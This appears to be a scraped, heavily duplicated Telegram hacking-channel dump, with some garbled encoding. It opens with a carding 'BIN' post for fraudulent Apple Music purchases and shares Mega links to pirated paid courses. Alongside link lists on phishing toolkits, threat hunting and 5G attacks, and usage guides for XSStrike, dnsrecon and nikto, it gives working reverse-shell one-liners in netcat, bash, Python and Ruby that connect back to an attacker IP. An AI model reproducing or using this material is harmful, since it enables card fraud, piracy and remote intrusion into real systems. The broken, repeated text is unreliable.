Forwarded from UNDERCODE COMMUNITY
๐ฆBIN APPLE MUSIC (RUSSIAN BIN) works well
53: 538763xxxxxxxxxx
ECFECHA: 9/24
VCVV: 999
โ IP: ะะฝะดะธั
โ ะกััะปะบะฐ: https://music.apple.com/in/for-you?ign-itscg=10000&ign-itsct=401x
AlleCalle: 39-ะน ััะฐะถ, Century Bhavan, Nr.passport Office, ะัะฐะฑั ะฐะดะตะฒะธ
> ะกััะดะฐะด: ะะฐั ะฐัะฐัััะฐ
ะญััะฐะดะพ: ะัะผะฑะฐะธ
OdCodigo ะะฝะดะตะบั: 400025
LeTelefono: 022xxxxxxxx
53: 538763xxxxxxxxxx
ECFECHA: 9/24
VCVV: 999
โ IP: ะะฝะดะธั
โ ะกััะปะบะฐ: https://music.apple.com/in/for-you?ign-itscg=10000&ign-itsct=401x
AlleCalle: 39-ะน ััะฐะถ, Century Bhavan, Nr.passport Office, ะัะฐะฑั ะฐะดะตะฒะธ
> ะกััะดะฐะด: ะะฐั ะฐัะฐัััะฐ
ะญััะฐะดะพ: ะัะผะฑะฐะธ
OdCodigo ะะฝะดะตะบั: 400025
LeTelefono: 022xxxxxxxx
Appleย Music
Get millions of songs. All ad-free.
Plus your entire music library on all your devices.
Forwarded from UNDERCODE COMMUNITY
๐ฆ HELPFULL BOTs For Telegram Users :
(from botListchat grp)
โข๐๐Inline Web Search - Busqueda Web en lรญnea
@ArcheWikiBot ๐
@GoodReadsBooksBot
@GoogleDEBot ๐
@GoogleSearchUnofficialBot ๐
@GoogramBot ๐
@HentaiDBot ๐
@hotRedditBot ๐
@inlinepixivbot
@inlineredditbot ๐
@instant_utilities_bot
@itorrentsearchbot ๐
@letmebot ๐
@letmegbot ๐
@lmddgtfybot ๐
@NephoBot ๐
@PHPFuncsBot ๐
@PHPIndexBot ๐
@podsearchbot ๐
๐ @ribot ๐
@TorrentSearchRoBot ๐
@TubeListBot ๐
(from botListchat grp)
โข๐๐Inline Web Search - Busqueda Web en lรญnea
@ArcheWikiBot ๐
@GoodReadsBooksBot
@GoogleDEBot ๐
@GoogleSearchUnofficialBot ๐
@GoogramBot ๐
@HentaiDBot ๐
@hotRedditBot ๐
@inlinepixivbot
@inlineredditbot ๐
@instant_utilities_bot
@itorrentsearchbot ๐
@letmebot ๐
@letmegbot ๐
@lmddgtfybot ๐
@NephoBot ๐
@PHPFuncsBot ๐
@PHPIndexBot ๐
@podsearchbot ๐
๐ @ribot ๐
@TorrentSearchRoBot ๐
@TubeListBot ๐
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
#Social Engineering
* [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit)
* [Social Engineer Portal](https://www.social-engineer.org/)
* [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411)
* [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf)
* [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)
* [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)
* [USB Drop Attacks: The Danger of รขโฌลLost And Foundรขโฌ Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-
and-found-thumb-drives/)
* [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing)
* [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/)
* [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
#Social Engineering
* [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit)
* [Social Engineer Portal](https://www.social-engineer.org/)
* [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411)
* [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf)
* [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)
* [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)
* [USB Drop Attacks: The Danger of รขโฌลLost And Foundรขโฌ Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-
and-found-thumb-drives/)
* [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing)
* [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/)
* [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - trustedsec/social-engineer-toolkit: The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions ofโฆ
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. - trustedsec/social-engineer-toolkit
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#Threat Hunting Resources
# Platforms and Tools
- [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversaryโs lifecycle and the platforms they are known to target.
- [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CKโข) adversary model.
- [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.
- [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database.
- [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response.
- [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.
- [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing.
- [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques.
- [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework.
- [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API.
- [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity.
- [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting.
- [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module.
- [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics.
- [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros.
- [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API.
- [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies.
- [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).
- [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.
- [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf)
- [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting.
๐ฆ#Threat Hunting Resources
# Platforms and Tools
- [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversaryโs lifecycle and the platforms they are known to target.
- [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CKโข) adversary model.
- [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.
- [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database.
- [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response.
- [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.
- [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing.
- [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques.
- [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework.
- [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API.
- [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity.
- [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting.
- [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module.
- [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics.
- [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros.
- [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API.
- [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies.
- [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).
- [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.
- [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf)
- [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting.
MITRE Cyber Analytics Repository
Welcome to the Cyber Analytics Repository
- [Cyber Kill Chain](https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html) - It is part of the Intelligence Driven Defenseยฎ model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.
- [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.
- [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
- [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.
- [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Lockheed Martin
Cyber Kill Chainยฎ
Lockheed Martin's Cyber Kill Chainยฎ strengthens cybersecurity. Prevent cyber intrusions with our Intelligence Driven Defenseยฎ model.
๐ฆCOURSE 2020
React, NodeJS, Express & MongoDB - The MERN Fullstack Guide โ-7.36 GBโ
https://www.udemy.com/course/react-nodejs-express-mongodb-the-mern-fullstack-guide/
https://mega.nz/#F!t0gxiQCJ!SOcavcYCyx4Y1hAhkNO3jQ
React, NodeJS, Express & MongoDB - The MERN Fullstack Guide โ-7.36 GBโ
https://www.udemy.com/course/react-nodejs-express-mongodb-the-mern-fullstack-guide/
https://mega.nz/#F!t0gxiQCJ!SOcavcYCyx4Y1hAhkNO3jQ
Udemy
React, NodeJS, Express & MongoDB - The MERN Fullstack Guide
Build fullstack React.js applications with Node.js, Express.js & MongoDB (MERN) with this project-focused course.
๐ฆImage Processing Toolbox in MATLAB new โ2.11 GB
https://www.udemy.com/course/image-processing-toolbox-in-matlab/
https://mega.nz/folder/xExg2IhZ#dV12uKTyY1PGCCP0KRFRxQ
https://www.udemy.com/course/image-processing-toolbox-in-matlab/
https://mega.nz/folder/xExg2IhZ#dV12uKTyY1PGCCP0KRFRxQ
Udemy
Online Courses - Learn Anything, On Your Schedule | Udemy
Udemy is an online learning and teaching marketplace with over 250,000 courses and 80 million students. Learn programming, marketing, data science and more.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
๐ฆOs :
> debians (kali-parrot-ubuntu...)
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃgit clone https://github.com/s0md3v/XSStrike
2๏ธโฃcd XSStrike
2๏ธโฃpython xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4๏ธโฃScan a single URL
Option: -u or --url
5๏ธโฃTest a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6๏ธโฃSupplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7๏ธโฃTesting URL path components
Option: --path
8๏ธโฃWant to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9๏ธโฃTreat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
๐Crawling
Option: --crawl
For more type -h
โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
๐ฆOs :
> debians (kali-parrot-ubuntu...)
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃgit clone https://github.com/s0md3v/XSStrike
2๏ธโฃcd XSStrike
2๏ธโฃpython xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4๏ธโฃScan a single URL
Option: -u or --url
5๏ธโฃTest a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6๏ธโฃSupplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7๏ธโฃTesting URL path components
Option: --path
8๏ธโฃWant to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9๏ธโฃTreat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
๐Crawling
Option: --crawl
For more type -h
โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - s0md3v/XSStrike: Most advanced XSS scanner.
Most advanced XSS scanner. Contribute to s0md3v/XSStrike development by creating an account on GitHub.
๐ฆReview and Manage the SAP MRP List -244 MB
https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list
https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q
https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list
https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q
LinkedIn
Review and Manage the SAP MRP List Online Class | LinkedIn Learning, formerly Lynda.com
Learn how to review and manage SAP material requirements planning (MRP) lists: a key information source for anyone involved in inventory control and manufacturing.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
De Gruyter
Independent academic publisher dedicated to high-caliber scholarship from around the world โ since 1749.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#DNS Reconnassaince :
1๏ธโฃDNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2๏ธโฃReverse lookup for IP range:
>
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#DNS Reconnassaince :
1๏ธโฃDNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2๏ธโฃReverse lookup for IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50
3๏ธโฃRetrieve standard DNS records:./dnsrecon.rb -t std -d example.com
4๏ธโฃEnumerate subdornains:./dnsrecon.rb -t brt -d example.com -w hosts.txt
5๏ธโฃDNS zone transfer:./dnsrecon -d example.com -t axfr
6๏ธโฃParsing NMAP Reverse DNS Lookup>
nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - darkoperator/dnsrecon: DNS Enumeration Script
DNS Enumeration Script. Contribute to darkoperator/dnsrecon development by creating an account on GitHub.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#Netcat Linux Reverse Shell :
1๏ธโฃ
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2๏ธโฃ Netcat Linux Reverse Shell
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3๏ธโฃ Using Bash
5๏ธโฃ Using Ruby
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ#Netcat Linux Reverse Shell :
1๏ธโฃ
nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2๏ธโฃ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3๏ธโฃ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1
4๏ธโฃ Using Pythonpython -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' 5๏ธโฃ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBuild your first Microservices application using Go and gRPC (Golang) โ1.36 GBโ
https://www.udemy.com/course/microservices-go-grpc/
https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA
๐ฆBuild your first Microservices application using Go and gRPC (Golang) โ1.36 GBโ
https://www.udemy.com/course/microservices-go-grpc/
https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA
Udemy
Build your first Microservices application using Go and gRPC
Get a hands on head start in the world of Microservices using cutting-edge tech like Go & gRPC
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
#Useful SNMP Commands
1๏ธโฃSearch for Windows installed software
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
#Useful SNMP Commands
1๏ธโฃSearch for Windows installed software
smpwalk !grep hrSWinstalledName
2๏ธโฃ Search for Windows userssnmpwalk ip 1.3 lgrep --.1.2.25 -f4
3๏ธโฃ Search for Windows running servicessnrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4
4๏ธโฃ Search for Windows open TCP portssmpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u
> git sourcesโ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 updated web server scanner :
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃgit clone https://github.com/sullo/nikto
# Main script is in program/
2๏ธโฃcd nikto/program
# Run using the shebang interpreter
3๏ธโฃ./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4๏ธโฃperl nikto.pl -h http://www.example.com
๐ฆRun as a Docker container:
1๏ธโฃgit clone https://github.com/sullo/nikto.git
2๏ธโฃcd nikto
3๏ธโฃdocker build -t sullo/nikto .
# Call it without arguments to display the full help
4๏ธโฃdocker run --rm sullo/nikto
# Basic usage
5๏ธโฃdocker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6๏ธโฃdocker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 updated web server scanner :
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃgit clone https://github.com/sullo/nikto
# Main script is in program/
2๏ธโฃcd nikto/program
# Run using the shebang interpreter
3๏ธโฃ./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4๏ธโฃperl nikto.pl -h http://www.example.com
๐ฆRun as a Docker container:
1๏ธโฃgit clone https://github.com/sullo/nikto.git
2๏ธโฃcd nikto
3๏ธโฃdocker build -t sullo/nikto .
# Call it without arguments to display the full help
4๏ธโฃdocker run --rm sullo/nikto
# Basic usage
5๏ธโฃdocker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6๏ธโฃdocker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
